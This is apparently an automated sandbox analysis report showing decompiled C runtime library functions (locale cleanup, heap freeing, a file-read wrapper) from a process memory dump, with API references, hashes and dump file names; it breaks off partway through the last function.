0x001a20b7
0x001a2076
0x001a207f
0x001a2081
0x001a2081
0x001a2083
0x001a2086
0x001a2089
0x001a208c
0x001a208e
0x001a2093
0x001a2096
0x001a2099
0x001a209c
0x001a209e
0x001a20a3
0x001a20a4
0x001a20a4
0x001a20a8
0x001a20ab
0x001a20ae
0x00000000
0x001a20ae
0x001a20b9
0x001a20b9
0x00000000
0x001a20b9
0x001a2001
0x001a2004
0x001a2011
0x001a2013
0x001a2018
0x001a201b
0x001a201e
0x001a2026
0x001a2028
0x001a2036
0x001a2039
0x001a203c
0x001a203f
0x001a2041
0x001a2044
0x001a2048
0x00000000
0x001a204f
0x001a1ecc
0x001a1ed3
0x001a1eed
0x001a1ef0
0x001a1ef3
0x00000000
0x00000000
0x001a1ef5
0x001a1ef8
0x001a1ef8
0x001a1efb
0x001a1efd
0x00000000
0x00000000
0x001a1eff
0x001a1f05
0x001a1f07
0x001a1f16
0x001a1f16
0x001a1f19
0x001a1f1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001a1f09
0x001a1f09
0x001a1f09
0x001a1f0d
0x001a1f12
0x001a1f12
0x00000000
0x001a1f09
0x001a1f1d
0x00000000
0x001a1f1d
0x001a1ee3
0x001a1ee8
0x00000000
0x001a1ee8
0x001a1e7c
0x001a1e68
0x001a1de1
0x001a1de2
0x001a1de7
0x001a1deb
0x001a1dec
0x001a1ded
0x001a1df2
0x001a1df7
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 001A1E0A
_free.LIBCMT ref: 001A1E20
_free.LIBCMT ref: 001A1E33
_free.LIBCMT ref: 001A1E48
_free.LIBCMT ref: 001A1E5D
GetCPInfo.KERNEL32(?,?), ref: 001A1EA7

Part of subcall function 001AB24B: _free.LIBCMT ref: 001AB2B6

_free.LIBCMT ref: 001A2112
_free.LIBCMT ref: 001A2125
_free.LIBCMT ref: 001A2133
_free.LIBCMT ref: 001A213E
_free.LIBCMT ref: 001A2180
_free.LIBCMT ref: 001A2188
_free.LIBCMT ref: 001A218E
_free.LIBCMT ref: 001A2196
_free.LIBCMT ref: 001A21A4

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: b8ac6361e1f2b545471b5f36835146064fd4f0f8b8f27be6260a341b8c3d9782
Instruction ID: e57c2478b1a284865085c802c18e6dc4dc9d21428a745b237931810708f4ecc2
Opcode Fuzzy Hash: b8ac6361e1f2b545471b5f36835146064fd4f0f8b8f27be6260a341b8c3d9782
Instruction Fuzzy Hash: 0CD1BD759003099FDB21CFB8C881BEEBBF5BF5A300F144029F995A7292D775A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001AE96B Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001AE96B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1c3070) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E001A71B2(_t46);
							E001ADC17( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E001A71B2(_t47);
							E001AE0CB( *((intOrPtr*)(_t74 + 0x88)));
						}
						E001A71B2( *((intOrPtr*)(_t74 + 0x7c)));
						E001A71B2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E001A71B2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E001A71B2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E001A71B2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E001A71B2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E001AEADC( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1c3268) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E001A71B2(_t31);
							E001A71B2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E001A71B2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E001A71B2(_t74);
			}

0x001ae973
0x001ae977
0x001ae97f
0x001ae988
0x001ae98d
0x001ae994
0x001ae99c
0x001ae9a4
0x001ae9af
0x001ae9b5
0x001ae9b6
0x001ae9be
0x001ae9c6
0x001ae9d1
0x001ae9d7
0x001ae9db
0x001ae9e6
0x001ae9ec
0x001ae98d
0x001ae9ed
0x001ae9f5
0x001aea08
0x001aea1b
0x001aea29
0x001aea34
0x001aea39
0x001aea42
0x001aea4a
0x001aea4b
0x001aea51
0x001aea54
0x001aea57
0x001aea5e
0x001aea60
0x001aea64
0x001aea6c
0x001aea73
0x001aea79
0x001aea7a
0x001aea7a
0x001aea81
0x001aea83
0x001aea88
0x001aea90
0x001aea95
0x001aea96
0x001aea96
0x001aea99
0x001aea9c
0x001aea9f
0x001aeaa2
0x001aeaa2
0x001aeab2

APIs

___free_lconv_mon.LIBCMT ref: 001AE9AF

Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADC34
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADC46
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADC58
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADC6A
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADC7C
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADC8E
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADCA0
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADCB2
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADCC4
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADCD6
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADCE8
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADCFA
Part of subcall function 001ADC17: _free.LIBCMT ref: 001ADD0C

_free.LIBCMT ref: 001AE9A4

Part of subcall function 001A71B2: HeapFree.KERNEL32(00000000,00000000,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?), ref: 001A71C8
Part of subcall function 001A71B2: GetLastError.KERNEL32(?,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?,?), ref: 001A71DA

_free.LIBCMT ref: 001AE9C6
_free.LIBCMT ref: 001AE9DB
_free.LIBCMT ref: 001AE9E6
_free.LIBCMT ref: 001AEA08
_free.LIBCMT ref: 001AEA1B
_free.LIBCMT ref: 001AEA29
_free.LIBCMT ref: 001AEA34
_free.LIBCMT ref: 001AEA6C
_free.LIBCMT ref: 001AEA73
_free.LIBCMT ref: 001AEA90
_free.LIBCMT ref: 001AEAA8

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7e737b1c2a08cb47de5109c05cb1c86b51517f5dd164ac5f2947107ff4d4bb60
Instruction ID: 70d7ec3ee2214e966fdf99089cafd15ebe17fdff7fb6385c9773237d6a22c62d
Opcode Fuzzy Hash: 7e737b1c2a08cb47de5109c05cb1c86b51517f5dd164ac5f2947107ff4d4bb60
Instruction Fuzzy Hash: 64316A79604301AFEB31AA38DC45B6A73EABF52350F10842AF499D7291DB75ED84CB24

Uniqueness

Uniqueness Score: -1.00%

Function 001ADD15 Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E001ADD15(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E001A58A2(1, 0x50);
					_v8 = _t235;
					E001A71B2(0);
					if(_t235 != 0) {
						_t228 = E001A58A2(1, 4);
						_v12 = _t228;
						E001A71B2(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x1c3070, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E001A58A2(1, 4);
							_v16 = _t233;
							E001A71B2(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E001AB24B(_t225);
								_t118 = E001AB24B(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E001AB24B(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E001AB24B(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E001AB24B(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E001AB24B(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E001AB24B(_t225);
								_t142 = E001AB24B(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E001AB24B(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E001AB24B(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E001AB24B(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E001AB24B(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E001AB24B(_t225);
								_t166 = E001AB24B(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E001AB24B(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E001AB24B(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E001AB24B(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E001AB24B(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E001AB24B(_t225);
								_t190 = E001AB24B(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E001AB24B(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E001ADC17(_v8);
								E001A71B2(_v8);
								E001A71B2(_v12);
								E001A71B2(_v16);
								goto L4;
							}
							E001A71B2(_t235);
							E001A71B2(_v12);
							L7:
							goto L4;
						}
						E001A71B2(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x1c3070;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E001A71B2( *(_t209 + 0x88));
							E001A71B2( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x001add15
0x001add1e
0x001add25
0x001add28
0x001add2b
0x001add34
0x001add56
0x001add5a
0x001add5d
0x001add67
0x001add7a
0x001add7e
0x001add81
0x001add8b
0x001add9d
0x001ae02f
0x001ae030
0x001ae032
0x001ae03a
0x001ae03e
0x001ae043
0x001ae04e
0x001ae05a
0x001ae066
0x001ae072
0x001ae078
0x001ae07c
0x001ae07e
0x001ae07e
0x00000000
0x001ae07c
0x001addac
0x001addb0
0x001addb3
0x001addbd
0x001addd1
0x001addd7
0x001adde4
0x001addfb
0x001ade12
0x001ade29
0x001ade39
0x001ade46
0x001ade5d
0x001ade74
0x001ade8b
0x001adea5
0x001adebc
0x001aded3
0x001adeea
0x001adf04
0x001adf1b
0x001adf32
0x001adf49
0x001adf63
0x001adf7a
0x001adf87
0x001adf88
0x001adf8a
0x001adf91
0x001adfa8
0x001adfcc
0x001adffa
0x001ae009
0x001ae009
0x001ae00d
0x00000000
0x00000000
0x001adffe
0x001adffe
0x001ae004
0x001ae013
0x001ae008
0x001ae008
0x00000000
0x001ae008
0x001ae015
0x001ae017
0x001ae017
0x001ae01a
0x001ae01c
0x001ae01f
0x00000000
0x001ae023
0x001ae006
0x00000000
0x001ae006
0x00000000
0x001ae00f
0x001adfd2
0x001adfd8
0x001adfe1
0x001adfea
0x00000000
0x001adfef
0x001addc0
0x001addc9
0x001add93
0x00000000
0x001add93
0x001add8e
0x00000000
0x001add8e
0x001add69
0x00000000
0x001add3e
0x001add3e
0x001add40
0x001add43
0x001ae080
0x001ae080
0x001ae088
0x001ae08a
0x001ae08a
0x001ae092
0x001ae097
0x001ae09b
0x001ae0a3
0x001ae0ab
0x001ae0b1
0x001ae09b
0x001ae0b5
0x001ae0ba
0x001ae0c0
0x00000000
0x001ae0c0

APIs

_free.LIBCMT ref: 001ADD5D
_free.LIBCMT ref: 001ADD81
_free.LIBCMT ref: 001ADD8E
_free.LIBCMT ref: 001ADDB3
_free.LIBCMT ref: 001ADDC0
_free.LIBCMT ref: 001ADDC9
_free.LIBCMT ref: 001AE0A3
_free.LIBCMT ref: 001AE0AB

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f1803517aec914183fa8c54b3b3137cb5874ef8d4e1f38e9ebaa9be178e4f50a
Instruction ID: a43e0d2026bd619761d4b1741b66f0981a221f0f8a641754712143df9654511a
Opcode Fuzzy Hash: f1803517aec914183fa8c54b3b3137cb5874ef8d4e1f38e9ebaa9be178e4f50a
Instruction Fuzzy Hash: 38C15376E40204AFDB20DBA8CC86FEE77F8AB59710F144165FA05FB2C2D775A9408B64

Uniqueness

Uniqueness Score: -1.00%

Function 001A5C59 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E001A5C59(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x1b70c0;
				if(_t68 != 0x1b70c0) {
					E001A71B2(_t68);
					_t36 = _a4;
				}
				E001A71B2( *((intOrPtr*)(_t36 + 0x3c)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x30)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x34)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x38)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x28)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x2c)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x40)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x44)));
				E001A71B2( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E001A5A85(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E001A5AF0(_t67, _t72, _t73, _t77);
			}

0x001a5c59
0x001a5c59
0x001a5c59
0x001a5c5e
0x001a5c64
0x001a5c66
0x001a5c6c
0x001a5c6f
0x001a5c74
0x001a5c77
0x001a5c7b
0x001a5c86
0x001a5c91
0x001a5c9c
0x001a5ca7
0x001a5cb2
0x001a5cbd
0x001a5cc8
0x001a5cd6
0x001a5ce1
0x001a5ce9
0x001a5cea
0x001a5ced
0x001a5cf3
0x001a5cf7
0x001a5cfb
0x001a5cfc
0x001a5d06
0x001a5d0c
0x001a5d0d
0x001a5d10
0x001a5d16
0x001a5d1a
0x001a5d1e
0x001a5d25

APIs

_free.LIBCMT ref: 001A5C6F

Part of subcall function 001A71B2: HeapFree.KERNEL32(00000000,00000000,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?), ref: 001A71C8
Part of subcall function 001A71B2: GetLastError.KERNEL32(?,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?,?), ref: 001A71DA

_free.LIBCMT ref: 001A5C7B
_free.LIBCMT ref: 001A5C86
_free.LIBCMT ref: 001A5C91
_free.LIBCMT ref: 001A5C9C
_free.LIBCMT ref: 001A5CA7
_free.LIBCMT ref: 001A5CB2
_free.LIBCMT ref: 001A5CBD
_free.LIBCMT ref: 001A5CC8
_free.LIBCMT ref: 001A5CD6

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e6459c6c06bcc343f5b4bfb999b767065595e55a35fc726a554cf70e26f88dbe
Instruction ID: e83fcfb8b14cabfc2319cd4c5513abad5e1a207691018edb062ce7aa25c1ff51
Opcode Fuzzy Hash: e6459c6c06bcc343f5b4bfb999b767065595e55a35fc726a554cf70e26f88dbe
Instruction Fuzzy Hash: F421987A904108AFCB41EFA4CC81DEE7BB9BF59340B004166F5159B261DB35DB88CB94

Uniqueness

Uniqueness Score: -1.00%

Function 001B11D9 Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E001B11D9(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E0019FD11(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E0019FD24( *_t137))) = 9;
						L60:
						_t139 = E001A013F();
						goto L61;
					}
					__eflags = _t198 -  *0x1f1018;
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x1f0e18 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E0019FD11(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E0019FD24(__eflags))) = 0x16;
								E001A013F();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E001A871A(_t154);
								E001A71B2(0);
								E001A71B2(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E001AB030(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x1f0e18 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x1f0e18 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x1f0e18 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1f0e18 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x1f0e18 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1f0e18 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x1f0e18 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E001B165E(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0019FCEE(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E0019FD24(__eflags))) = 9;
											 *(E0019FD11(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
